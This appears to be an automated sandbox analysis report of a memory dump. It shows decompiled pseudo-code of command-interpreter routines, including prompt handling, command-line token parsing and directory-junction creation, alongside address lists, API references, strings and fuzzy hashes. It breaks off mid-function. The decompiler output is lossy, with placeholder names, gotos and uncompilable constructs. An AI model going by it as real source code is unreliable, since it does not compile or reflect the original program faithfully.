								_t142 =  *_t191;
								_t191 = _t191 + 2;
							} while (_t142 != 0);
							_t193 = _t191 - _v656 >> 1;
							_t201 = _t201 + _t193 * 2;
							_v652 = _t201;
							_t209 = _t209 - _t193;
							_v648 = _t209;
							if(E003368B5() == 0) {
								L22:
								_v672 = _t174;
								goto L85;
							}
							_v656 =  *_v660 & 0x0000ffff;
							if(E00357AB0( *_v660 & 0x0000ffff) == 0) {
								_t174 = 0;
								goto L22;
							}
							_v672 = _v656 & 0x0000ffff;
							goto L85;
						}
						goto L91;
					}
				}
			}

0x00356ff3
0x00356ff5
0x00356ff6
0x00356ffa
0x00357001
0x00357005
0x00357007
0x00357009
0x0035700e
0x00357019
0x0035701a
0x0035701b
0x0035701c
0x0035701d
0x00357023
0x00357028
0x0035702b
0x0035702d
0x00357032
0x00357033
0x00357036
0x0035703c
0x00357041
0x00357047
0x0035704d
0x0035704f
0x00357050
0x00357055
0x00357062
0x00357068
0x00357074
0x00357074
0x0035707a
0x00357080
0x00357678
0x0035767b
0x00357683
0x00357684
0x00357695
0x00357086
0x00357086
0x0035708c
0x00357093
0x00357098
0x003570a0
0x003570b9
0x003570bb
0x003570c3
0x003570d0
0x003570d8
0x003570dd
0x003570dd
0x003570a2
0x003570a7
0x003570a7
0x003570e4
0x003570ec
0x003570ee
0x003570ee
0x003570f4
0x003570fa
0x00357105
0x0035710a
0x00357112
0x00000000
0x00357118
0x00357118
0x0035711a
0x00357122
0x0035712b
0x0035712c
0x00357132
0x0035713a
0x003575eb
0x003575eb
0x003575f2
0x003575f4
0x003575f4
0x00357600
0x00357607
0x0035760f
0x00357611
0x00357611
0x00357616
0x00357616
0x00357619
0x0035761c
0x00357625
0x00357628
0x00357628
0x0035762a
0x0035762c
0x0035762f
0x00357635
0x00357637
0x00357637
0x0035763a
0x0035763a
0x0035763d
0x00357640
0x00357647
0x0035764b
0x00357657
0x0035765f
0x00357665
0x00357672
0x00357672
0x00000000
0x00357657
0x00357140
0x00357146
0x00000000
0x00000000
0x00000000
0x0035714c
0x00357159
0x003571ed
0x003571f0
0x003571f6
0x003571fe
0x00357200
0x0035720a
0x00357220
0x00357224
0x00357224
0x0035722a
0x00357230
0x00357235
0x00000000
0x00000000
0x0035723b
0x0035723b
0x00357245
0x0035724b
0x00357251
0x00000000
0x00000000
0x00357257
0x00357257
0x00357261
0x0035729d
0x0035729d
0x003572a3
0x00357582
0x00357582
0x00357589
0x0035758b
0x0035758b
0x0035759b
0x003575a0
0x003575a3
0x003575a8
0x003575b0
0x003575b0
0x003575b3
0x003575b6
0x003575bb
0x003575c1
0x003575c1
0x003575c3
0x003575c5
0x003575c8
0x003575c8
0x003575ce
0x003575d4
0x003575da
0x003575dd
0x003575e3
0x00000000
0x003575e3
0x003572a9
0x00000000
0x003572b7
0x00000000
0x00000000
0x003572c8
0x003572ca
0x003572cb
0x003572cd
0x003572bc
0x003572bc
0x003572bf
0x00000000
0x00000000
0x003572d4
0x003572db
0x003572dd
0x003572dd
0x003572ea
0x003572f2
0x003572f4
0x003572f7
0x003572fd
0x003572ff
0x003572ff
0x00357302
0x00357305
0x0035730a
0x00000000
0x00000000
0x00357315
0x0035731d
0x0035732b
0x00357343
0x00357349
0x0035734b
0x0035734e
0x00357350
0x00357350
0x00357353
0x00357356
0x0035735b
0x0035735d
0x00000000
0x00000000
0x00357370
0x00357375
0x00357377
0x00357377
0x0035737d
0x0035737f
0x00357381
0x00357386
0x00357388
0x0035738b
0x00357391
0x00357393
0x00357393
0x00357396
0x00357399
0x0035739e
0x00000000
0x00000000
0x003573ae
0x003573b0
0x003573b2
0x003573b7
0x003573b9
0x003573bc
0x003573c2
0x003573c4
0x003573c4
0x003573c7
0x003573ca
0x003573cf
0x00000000
0x00000000
0x00000000
0x00000000
0x003573e1
0x00000000
0x00000000
0x003573e7
0x00357410
0x003573ef
0x003573f1
0x003573f4
0x00000000
0x00000000
0x003573fa
0x003573fc
0x003573fd
0x00357400
0x00357403
0x00357409
0x0035740a
0x0035740a
0x00000000
0x00000000
0x00357421
0x00000000
0x00000000
0x00357427
0x0035742d
0x00357435
0x00357437
0x00357439
0x00357439
0x0035743e
0x00357441
0x00357447
0x00357449
0x00357449
0x0035744e
0x00357452
0x00357456
0x00357458
0x00357459
0x0035745d
0x0035745f
0x00357463
0x00357470
0x00000000
0x00357476
0x00357476
0x00357478
0x0035747c
0x00357486
0x00357489
0x00357490
0x003574b2
0x00357492
0x00357492
0x00357498
0x00357499
0x0035749f
0x003574a0
0x003574a3
0x003574a4
0x003574aa
0x003574aa
0x003574bc
0x0035750b
0x0035755a
0x00357562
0x00357564
0x00357567
0x0035756d
0x0035756f
0x0035756f
0x00357572
0x00357575
0x0035757a
0x0035750d
0x00357517
0x00000000
0x00000000
0x0035751d
0x00357522
0x00357523
0x00357524
0x00357529
0x0035752c
0x0035752e
0x00357531
0x00357537
0x00357539
0x00357539
0x0035753c
0x0035753f
0x00357544
0x00357544
0x00000000
0x0035750b
0x00000000
0x003572a9
0x00357263
0x00357272
0x00357277
0x0035727a
0x0035727f
0x00357287
0x00357287
0x0035728a
0x0035728d
0x00357292
0x00000000
0x00357292
0x00357239
0x00000000
0x00357239
0x0035716a
0x0035716f
0x00357172
0x00357174
0x00357177
0x0035717d
0x0035717f
0x0035717f
0x00357182
0x00357185
0x00357190
0x00357192
0x00357195
0x0035719b
0x0035719d
0x003571aa
0x003571dc
0x003571dc
0x00000000
0x003571dc
0x003571b5
0x003571c4
0x003571da
0x00000000
0x003571da
0x003571cf
0x00000000
0x003571cf
0x00000000
0x0035714c
0x00357112

APIs

EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(D59BD0E8,?,00000000), ref: 00357062
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00357074

Part of subcall function 0033CFBC: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,0035F830,00002000,?,?,?,?,?,0034373A,0033590A,00000000), ref: 0033CFDF

towupper.MSVCRT ref: 0035720E
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00357343
GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,00331EB4,00333958), ref: 00357467
EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,D59BD0E8,?,00000000), ref: 0035765F
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00357672

Strings

%s>, xrefs: 003575FA
PROMPT, xrefs: 003570AF
%s , xrefs: 00357553
Unknown, xrefs: 0035751D

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave$DriveEnvironmentFreeLocalTypeVariabletowupper
String ID: %s $%s>$PROMPT$Unknown
API String ID: 708651206-3050974680
Opcode ID: 72ea067c5eacc821d3ef9591e28a3b292ba3480ce71584593e7560006d534e95
Instruction ID: d9e1f3ef358cca953c586a2893f7ade21fc55bcb61e54674e3bf3b83abe16356
Opcode Fuzzy Hash: 72ea067c5eacc821d3ef9591e28a3b292ba3480ce71584593e7560006d534e95
Instruction Fuzzy Hash: 910239789051158BCB37DF28DC49ABAB7B9EF45301F05819AEC09EB260EB305E89DF50

Uniqueness

Uniqueness Score: -1.00%

Function 0035B5E0, Relevance: 19.7, APIs: 13, Instructions: 180
filememorynativeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0035B5E0(void* __ecx, void* __eflags) {
				int _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				void* _v40;
				void* _v48;
				void* _t60;
				void _t64;
				void* _t68;
				signed int _t77;
				void _t80;
				signed short _t81;
				long _t88;
				WCHAR* _t91;
				void* _t97;
				intOrPtr* _t102;
				void* _t104;
				void* _t109;
				void* _t111;
				long _t114;
				void* _t115;
				void* _t116;
				void* _t117;

				_t115 = __ecx;
				_v40 = 0;
				_t114 = 1;
				_v16 = 0;
				_v36 = 0;
				_v24 = 0;
				_t91 = E0035B51A( *((intOrPtr*)(__ecx + 8)));
				_t116 = E0035B51A( *((intOrPtr*)(_t115 + 0xc)));
				if(_t91 == 0 || _t116 == 0) {
					L19:
					if(_v36 != 0) {
						RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _v36);
					}
					if(_t114 != 0 && _v24 != 0) {
						RemoveDirectoryW(_t91);
					}
					return _t114;
				} else {
					if(E0035B9D3(_t91, 0, 1) != 0) {
						if(E0035B91D(_t116) != 0) {
							if(CreateDirectoryW(_t91, 0) == 0) {
								goto L19;
							}
							_v24 = 1;
							_t60 = CreateFileW(_t91, 0x40000000, 1, 0, 3, 0x2000000, 0);
							_v20 = _t60;
							if(_t60 == 0xffffffff) {
								goto L19;
							}
							RtlDosPathNameToNtPathName_U(_t116,  &_v40, 0, 0);
							_t97 = _t116;
							_t10 = _t97 + 2; // 0x2
							_t109 = _t10;
							do {
								_t64 =  *_t97;
								_t97 = _t97 + 2;
							} while (_t64 != _v16);
							_v8 = (_v40 & 0x0000ffff) + (_t97 - _t109 >> 1) * 2 + 0x14;
							_t68 = E003400B0((_v40 & 0x0000ffff) + (_t97 - _t109 >> 1) * 2 + 0x14);
							_v12 = _t68;
							if(_t68 == 0) {
								_t117 = _v20;
								L18:
								CloseHandle(_t117);
								goto L19;
							}
							memset(_t68, 0, _v8);
							_t102 = _v12;
							 *((short*)(_t102 + 4)) = _v8 + 0xfffffff8;
							 *_t102 = 0xa0000003;
							 *((short*)(_t102 + 8)) = 0;
							 *((short*)(_t102 + 0xa)) = _v40;
							memcpy(_t102 + 0x10, _v36, _v40 & 0x0000ffff);
							_t111 = _v12;
							_t77 =  *(_t111 + 0xa) & 0x0000ffff;
							_v32 = _t77;
							_t104 = _t116;
							 *((short*)(_t111 + 0xc)) = _t77 + 2;
							_t31 = _t104 + 2; // 0x2
							_v28 = _t31;
							do {
								_t80 =  *_t104;
								_t104 = _t104 + 2;
							} while (_t80 != _v16);
							_t81 = (_t104 - _v28 >> 1) + (_t104 - _v28 >> 1);
							 *(_t111 + 0xe) = _t81;
							memcpy((_v32 & 0x0000ffff) + _t111 + 0x12, _t116, _t81 & 0x0000ffff);
							_t117 = _v20;
							_t88 = NtFsControlFile(_t117, 0, 0, 0,  &_v48, 0x900a4, _v12, _v8, 0, 0);
							if(_t88 >= 0) {
								_t114 = 0;
							} else {
								SetLastError(RtlNtStatusToDosError(_t88));
							}
							goto L18;
						}
						_push(0x40002749);
						L4:
						SetLastError();
						goto L19;
					}
					_push(0x4000272e);
					goto L4;
				}
			}

0x0035b5ea
0x0035b5f1
0x0035b5f4
0x0035b5f5
0x0035b5fb
0x0035b5fe
0x0035b609
0x0035b610
0x0035b614
0x0035b7a2
0x0035b7a6
0x0035b7b7
0x0035b7b7
0x0035b7bf
0x0035b7c8
0x0035b7c8
0x0035b7d6
0x0035b622
0x0035b62e
0x0035b649
0x0035b65e
0x00000000
0x00000000
0x0035b666
0x0035b679
0x0035b67f
0x0035b685
0x00000000
0x00000000
0x0035b694
0x0035b69a
0x0035b69c
0x0035b69c
0x0035b69f
0x0035b69f
0x0035b6a2
0x0035b6a5
0x0035b6bb
0x0035b6be
0x0035b6c3
0x0035b6c8
0x0035b798
0x0035b79b
0x0035b79c
0x00000000
0x0035b79c
0x0035b6d5
0x0035b6da
0x0035b6e6
0x0035b6ef
0x0035b6f5
0x0035b6fd
0x0035b70a
0x0035b70f
0x0035b715
0x0035b71e
0x0035b721
0x0035b723
0x0035b727
0x0035b72a
0x0035b72d
0x0035b72d
0x0035b730
0x0035b733
0x0035b73e
0x0035b741
0x0035b756
0x0035b75e
0x0035b778
0x0035b780
0x0035b794
0x0035b782
0x0035b78a
0x0035b78a
0x00000000
0x0035b780
0x0035b64b
0x0035b635
0x0035b635
0x00000000
0x0035b635
0x0035b630
0x00000000
0x0035b630

APIs

Part of subcall function 0035B51A: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?), ref: 0035B533
Part of subcall function 0035B51A: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000008,?,00000000,00000000,?), ref: 0035B54F

Part of subcall function 0035B51A: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?,?,00000000,00000000,?), ref: 0035B560

SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(40002749,00000001), ref: 0035B635
CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001), ref: 0035B656
CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000001,00000000,00000003,02000000,00000000), ref: 0035B679
RtlDosPathNameToNtPathName_U.NTDLL ref: 0035B694
memset.MSVCRT ref: 0035B6D5
memcpy.MSVCRT ref: 0035B70A
memcpy.MSVCRT ref: 0035B756
NtFsControlFile.NTDLL(?,00000000,00000000,00000000,?,000900A4,?,?,00000000,00000000), ref: 0035B778
RtlNtStatusToDosError.NTDLL ref: 0035B783
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 0035B78A
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 0035B79C
RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 0035B7B7
RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0035B7C8

Part of subcall function 0035B9D3: memset.MSVCRT ref: 0035BA0F
Part of subcall function 0035B9D3: memset.MSVCRT ref: 0035BA37
Part of subcall function 0035B9D3: GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 0035BAA8
Part of subcall function 0035B9D3: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 0035BAC7
Part of subcall function 0035B9D3: GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 0035BB0B

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememcpy$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType
String ID:
API String ID: 223857506-0
Opcode ID: 20b567bb08d14210d4c6cbc625209fbb161b218c949b8359ea5e85b0fd97a440
Instruction ID: d7f4526c40287f2b9be77bbf9a15ae594cb98fedfa56400cabedbd756210d321
Opcode Fuzzy Hash: 20b567bb08d14210d4c6cbc625209fbb161b218c949b8359ea5e85b0fd97a440
Instruction Fuzzy Hash: B2519D71A00205AFDB169FB5CC49EBEB7B8EF88305F14456AE806E7260E7359E45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0033E040, Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 289
COMMONCrypto

Download Yara Rule

C-Code - Quality: 76%

			E0033E040(long __ecx, long __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				signed int _v28;
				void _v548;
				signed int _v549;
				long _v556;
				long _v560;
				signed int _v564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t81;
				int _t85;
				void* _t89;
				WCHAR* _t90;
				signed char _t91;
				intOrPtr _t92;
				intOrPtr _t96;
				long _t104;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t110;
				int _t111;
				signed char _t113;
				void* _t114;
				intOrPtr _t116;
				signed int _t117;
				void* _t118;
				wchar_t* _t119;
				wchar_t* _t120;
				signed int _t121;
				signed int _t122;
				signed int _t124;
				signed int _t129;
				long _t130;
				intOrPtr* _t131;
				signed int _t133;
				intOrPtr* _t134;
				long _t136;
				void* _t145;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				long _t150;
				long _t151;
				signed int _t152;
				void* _t153;
				void* _t154;

				_t143 = __edx;
				_t81 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t81 ^ _t152;
				_v560 = __edx;
				_t150 = __ecx;
				_v549 = 0;
				_v556 = __ecx;
				_t122 = _t121 | 0xffffffff;
				_v28 = 0;
				_v24 = 1;
				_v20 = 0x104;
				memset( &_v548, 0, 0x104);
				_t154 = _t153 + 0xc;
				if(_v24 == 0) {
					_t85 = 0x104;
				} else {
					_t85 = 0x7fe7;
				}
				_t124 =  &_v548;
				if(E00340C70(_t124, _t85) < 0) {
					_t147 = 0xfffffffe;
					goto L31;
				} else {
					_t148 = 0;
					while(_t148 < 0x7fe6) {
						_t150 =  *( *((intOrPtr*)(_t150 + 0x38)) + _t148 * 2) & 0x0000ffff;
						_t116 = 0;
						if(_t150 == 0x22) {
							_t117 = _v549;
							_t124 = _t124 & 0xffffff00 | _t117 == 0x00000000;
							_v549 = _t124;
							if(_t117 == 0) {
								_t116 = 0;
							} else {
								_t116 = 1;
							}
							L8:
							if(_t124 != 0 || _t116 != 0) {
								L11:
								if(_t122 != 0xffffffff) {
									L13:
									_t118 = _v28;
									if(_t118 == 0) {
										_t118 =  &_v548;
									}
									 *(_t118 + _t148 * 2) = _t150;
									_t148 = _t148 + 1;
									_t150 = _v556;
									continue;
								}
								_t119 = wcschr(L":.\\", _t150);
								_t154 = _t154 + 8;
								if(_t119 != 0) {
									if( *0x373cc9 == 0) {
										break;
									}
									_t122 = _t148;
								}
								goto L13;
							} else {
								_t120 = wcschr(L"=,;+/[] \t\"", _t150);
								_t154 = _t154 + 8;
								if(_t120 != 0) {
									break;
								}
								goto L11;
							}
						}
						if(_t150 == 0) {
							break;
						}
						_t124 = _v549;
						goto L8;
					}
					_v564 = _t148;
					if(_t148 == 0) {
						_t147 = _t148 | 0xffffffff;
						L31:
						__imp__??_V@YAXPAX@Z();
						return E00346FD0(_t147, _t122, _v8 ^ _t152, _t143, _t147, _t150, _v28);
					}
					_t89 = _v28;
					if(_t89 == 0) {
						_t89 =  &_v548;
					}
					 *((short*)(_t89 + _t148 * 2)) = 0;
					if(_t122 != 0xffffffff) {
						_t90 = _v28;
						if(_t90 == 0) {
							_t90 =  &_v548;
						}
						_t91 = GetFileAttributesW(_t90);
						if(_t91 != 0xffffffff) {
							if((_t91 & 0x00000010) == 0) {
								goto L18;
							}
							goto L54;
						} else {
							L54:
							_t114 = _v28;
							_v564 = _t122;
							if(_t114 == 0) {
								_t114 =  &_v548;
							}
							 *((short*)(_t114 + _t122 * 2)) = 0;
							goto L18;
						}
					} else {
						L18:
						_t122 = _v28;
						if(_t122 == 0) {
							_t122 =  &_v548;
						}
						_t149 = 0;
						_t150 = 0x331628;
						do {
							_t24 = _t150 - 8; // 0x3335b0
							_t92 =  *_t24;
							if(_t92 == 0) {
								goto L22;
							}
							__imp___wcsicmp(_t122, _t92);
							_t154 = _t154 + 8;
							if(_t92 == 0) {
								_t113 =  *_t150 & 0x0000ffff;
								if((_t113 & 0x00000004) != 0) {
									if( *0x373cc9 != 0) {
										goto L25;
									}
									goto L22;
								}
								L25:
								_t128 = _v560;
								 *_v560 = _t113;
								L26:
								 *0x35d0dc = _t149;
								if(_t149 == 0xffffffff) {
									if(_v28 == 0) {
										_t143 =  &_v548;
									}
									_t129 = 0x2d;
									if(E0033DFC0(0x2d, _t143, _t128) == 0x2d) {
										_t147 = 0x2d;
									} else {
										_v549 = 0;
										_t122 = 0;
										while(1) {
											_t150 =  *( *((intOrPtr*)(_v556 + 0x38)) + _t122 * 2) & 0x0000ffff;
											if(_t150 == 0) {
												break;
											}
											_t109 = 0;
											if(_t150 == 0x22) {
												_t110 = _v549;
												_t129 = _t129 & 0xffffff00 | _t110 == 0x00000000;
												_v549 = _t129;
												if(_t110 == 0) {
													_t109 = 0;
												} else {
													_t109 = 1;
												}
											} else {
												_t129 = _v549;
											}
											if(_t129 == 0) {
												if(_t109 != 0) {
													goto L42;
												}
												_t111 = iswspace(_t150);
												_t154 = _t154 + 4;
												if(_t111 != 0) {
													break;
												}
												_t129 = L"=,;";
												if(E0033D7D4(_t129, _t150) != 0 || _t150 == 0x2f) {
													break;
												} else {
													goto L42;
												}
											} else {
												L42:
												_t122 = _t122 + 1;
												continue;
											}
										}
										_t130 = _v556;
										L28:
										_t131 =  *((intOrPtr*)(_t130 + 0x38));
										_t32 = _t131 + 2; // 0x2
										_t143 = _t32;
										do {
											_t96 =  *_t131;
											_t131 = _t131 + 2;
										} while (_t96 != 0);
										_t133 = _t131 - _t143 >> 1;
										if(_t122 != _t133) {
											_t66 = _t133 + 1; // -1
											_t151 = _t66;
											_t134 =  *((intOrPtr*)(_v556 + 0x3c));
											if(_t134 == 0) {
												L76:
												_t136 = E003400B0(_t151 + _t151);
												_v560 = _t136;
												if(_t136 == 0) {
													E00359287(_t136);
													__imp__longjmp(0x36b8b8, 1);
												}
												_t122 = _t122 + _t122;
												_t143 = _t151;
												E00341040(_t136, _t151,  *((intOrPtr*)(_v556 + 0x38)) + _t122);
												_t103 =  *((intOrPtr*)(_v556 + 0x3c));
												if( *((intOrPtr*)(_v556 + 0x3c)) == 0) {
													_t150 = _v560;
												} else {
													_t143 = _t151;
													_t150 = _v560;
													E003418C0(_t150, _t151, _t103);
												}
												_t104 = _v556;
												 *(_t104 + 0x3c) = _t150;
												 *((short*)(_t122 +  *((intOrPtr*)(_t104 + 0x38)))) = 0;
												goto L31;
											}
											_t145 = _t134 + 2;
											do {
												_t108 =  *_t134;
												_t134 = _t134 + 2;
											} while (_t108 != 0);
											_t151 = _t151 + (_t134 - _t145 >> 1);
											goto L76;
										}
									}
									goto L31;
								}
								_t130 = _v556;
								_t122 = _v564;
								if(_t149 == 0x14) {
									 *((intOrPtr*)(_t130 + 0x40)) = 1;
								}
								goto L28;
							}
							L22:
							_t150 = _t150 + 0x18;
							_t149 = _t149 + 1;
						} while (_t150 <= 0x331a18);
						_t128 = _v560;
						_t149 = _t149 | 0xffffffff;
						goto L26;
					}
				}
			}

0x0033e040
0x0033e04b
0x0033e052
0x0033e063
0x0033e069
0x0033e06b
0x0033e075
0x0033e07b
0x0033e07e
0x0033e085
0x0033e089
0x0033e090
0x0033e095
0x0033e09c
0x0034bd1d
0x0033e0a2
0x0033e0a2
0x0033e0a2
0x0033e0a8
0x0033e0b5
0x0034bd27
0x00000000
0x0033e0bb
0x0033e0bb
0x0033e0c0
0x0033e0cb
0x0033e0cf
0x0033e0d4
0x0033e212
0x0033e21a
0x0033e21d
0x0033e225
0x0033e310
0x0033e22b
0x0033e22b
0x0033e22b
0x0033e0e5
0x0033e0e7
0x0033e100
0x0033e103
0x0033e11c
0x0033e11c
0x0033e121
0x0034bd31
0x0034bd31
0x0033e127
0x0033e12b
0x0033e12c
0x00000000
0x0033e12c
0x0033e10b
0x0033e111
0x0033e116
0x0033e2d8
0x00000000
0x00000000
0x0033e2de
0x0033e2de
0x00000000
0x0033e0ed
0x0033e0f3
0x0033e0f9
0x0033e0fe
0x00000000
0x00000000
0x00000000
0x0033e0fe
0x0033e0e7
0x0033e0dd
0x00000000
0x00000000
0x0033e0df
0x00000000
0x0033e0df
0x0033e134
0x0033e13c
0x0034bd3c
0x0033e1ea
0x0033e1ed
0x0033e208
0x0033e208
0x0033e142
0x0033e147
0x0034bd44
0x0034bd44
0x0033e14f
0x0033e156
0x0033e2e5
0x0033e2ea
0x0033e328
0x0033e328
0x0033e2ed
0x0033e2f6
0x0033e320
0x00000000
0x00000000
0x00000000
0x0033e2f8
0x0033e2f8
0x0033e2f8
0x0033e2fb
0x0033e303
0x0033e330
0x0033e330
0x0033e307
0x00000000
0x0033e307
0x0033e15c
0x0033e15c
0x0033e15c
0x0033e161
0x0034bd4f
0x0034bd4f
0x0033e167
0x0033e169
0x0033e170
0x0033e170
0x0033e170
0x0033e175
0x00000000
0x00000000
0x0033e179
0x0033e17f
0x0033e184
0x0033e19d
0x0033e1a2
0x0034bd61
0x00000000
0x00000000
0x00000000
0x0034bd67
0x0033e1a8
0x0033e1a8
0x0033e1ae
0x0033e1b1
0x0033e1b1
0x0033e1ba
0x0033e237
0x0034bd6c
0x0034bd6c
0x0033e23e
0x0033e24b
0x0034bd77
0x0033e251
0x0033e251
0x0033e258
0x0033e260
0x0033e269
0x0033e270
0x00000000
0x00000000
0x0033e272
0x0033e277
0x0033e2b8
0x0033e2c0
0x0033e2c3
0x0033e2cb
0x0033e317
0x0033e2cd
0x0033e2cd
0x0033e2cd
0x0033e279
0x0033e279
0x0033e279
0x0033e281
0x0033e288
0x00000000
0x00000000
0x0033e28b
0x0033e291
0x0033e296
0x00000000
0x00000000
0x0033e29a
0x0033e2a6
0x00000000
0x00000000
0x00000000
0x00000000
0x0033e283
0x0033e283
0x0033e283
0x00000000
0x0033e283
0x0033e281
0x0033e2ad
0x0033e1cd
0x0033e1cd
0x0033e1d0
0x0033e1d0
0x0033e1d3
0x0033e1d3
0x0033e1d6
0x0033e1d9
0x0033e1e0
0x0033e1e4
0x0034bd87
0x0034bd87
0x0034bd8a
0x0034bd8f
0x0034bda5
0x0034bdad
0x0034bdaf
0x0034bdb7
0x0034bdb9
0x0034bdc5
0x0034bdc5
0x0034bdd1
0x0034bdd3
0x0034bddb
0x0034bde6
0x0034bdeb
0x0034bdff
0x0034bded
0x0034bded
0x0034bdef
0x0034bdf8
0x0034bdf8
0x0034be05
0x0034be0d
0x0034be13
0x00000000
0x0034be13
0x0034bd91
0x0034bd94
0x0034bd94
0x0034bd97
0x0034bd9a
0x0034bda3
0x00000000
0x0034bda3
0x0033e1e4
0x00000000
0x0033e24b
0x0033e1bc
0x0033e1c2
0x0033e1cb
0x0033e209
0x0033e209
0x00000000
0x0033e1cb
0x0033e186
0x0033e186
0x0033e189
0x0033e18a
0x0033e192
0x0033e198
0x00000000
0x0033e198
0x0033e156

APIs

memset.MSVCRT ref: 0033E090

Part of subcall function 00340C70: ??_V@YAXPAX@Z.MSVCRT ref: 00340CBA
Part of subcall function 00340C70: memset.MSVCRT ref: 00340CDD

wcschr.MSVCRT ref: 0033E0F3
wcschr.MSVCRT ref: 0033E10B
_wcsicmp.MSVCRT ref: 0033E179
??_V@YAXPAX@Z.MSVCRT ref: 0033E1ED
iswspace.MSVCRT ref: 0033E28B
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,00007FE7,?,?,00000000), ref: 0033E2ED

Strings

:.\, xrefs: 0033E106
=,;+/[] ", xrefs: 0033E0EE
=,;, xrefs: 0033E29A

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: memsetwcschr$AttributesFile_wcsicmpiswspace
String ID: :.\$=,;$=,;+/[] "
API String ID: 313872294-843887632
Opcode ID: 117d3869a4f6ab243ee726fda684cdeafebc6f0d6ed7a7841ffd79cf72c821ff
Instruction ID: 117d990b17ab1a182c2a6fbefd78b8c068ca9354a6394fc56fefc8e73ca70ea6
Opcode Fuzzy Hash: 117d3869a4f6ab243ee726fda684cdeafebc6f0d6ed7a7841ffd79cf72c821ff
Instruction Fuzzy Hash: FAA1F430E042149BDF269F68DCC4BFAB7B8AF45314F1605D9E816AB2D1DB30AD85DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0033B89C, Relevance: 18.3, APIs: 12, Instructions: 257
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E0033B89C(WCHAR* __ecx, short* __edx, signed int _a4) {
				signed int _v12;
				int _v24;
				char _v28;
				void* _v32;
				void _v552;
				struct _WIN32_FIND_DATAW _v1144;
				int _v1148;
				signed int _v1152;
				void* _v1156;
				char _v1160;
				intOrPtr _v1164;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t71;
				intOrPtr _t74;
				void* _t76;
				intOrPtr _t78;
				intOrPtr _t79;
				signed char _t80;
				short _t83;
				short _t84;
				void* _t86;
				signed int _t87;
				signed int _t88;
				signed int _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t99;
				intOrPtr _t110;
				signed int _t116;
				WCHAR* _t119;
				intOrPtr* _t124;
				WCHAR* _t129;
				signed int _t131;
				intOrPtr* _t134;
				signed int _t135;
				intOrPtr* _t138;
				signed int _t140;
				signed int _t144;
				short* _t146;
				void* _t148;
				short* _t150;
				void* _t151;
				int _t154;
				intOrPtr* _t155;
				void* _t159;
				signed int _t160;
				void* _t161;

				_t145 = __edx;
				_t71 =  *0x35d0b4; // 0xd59bd0e8
				_v12 = _t71 ^ _t160;
				_t119 = __ecx;
				_v1152 = _a4;
				_t155 = __ecx;
				_v1148 = 0;
				_t150 =  &(__ecx[1]);
				do {
					_t74 =  *_t155;
					_t155 = _t155 + 2;
				} while (_t74 != 0);
				_t157 = _t155 - _t150 >> 1;
				if((_t155 - _t150 >> 1) + 2 > __edx) {
					L10:
					_t76 = 0;
					L8:
					_pop(_t151);
					return E00346FD0(_t76, _t119, _v12 ^ _t160, _t145, _t151, _t157);
				}
				_t124 = __ecx;
				_t145 =  &(__ecx[1]);
				do {
					_t78 =  *_t124;
					_t124 = _t124 + 2;
				} while (_t78 != 0);
				_t157 = _v1152;
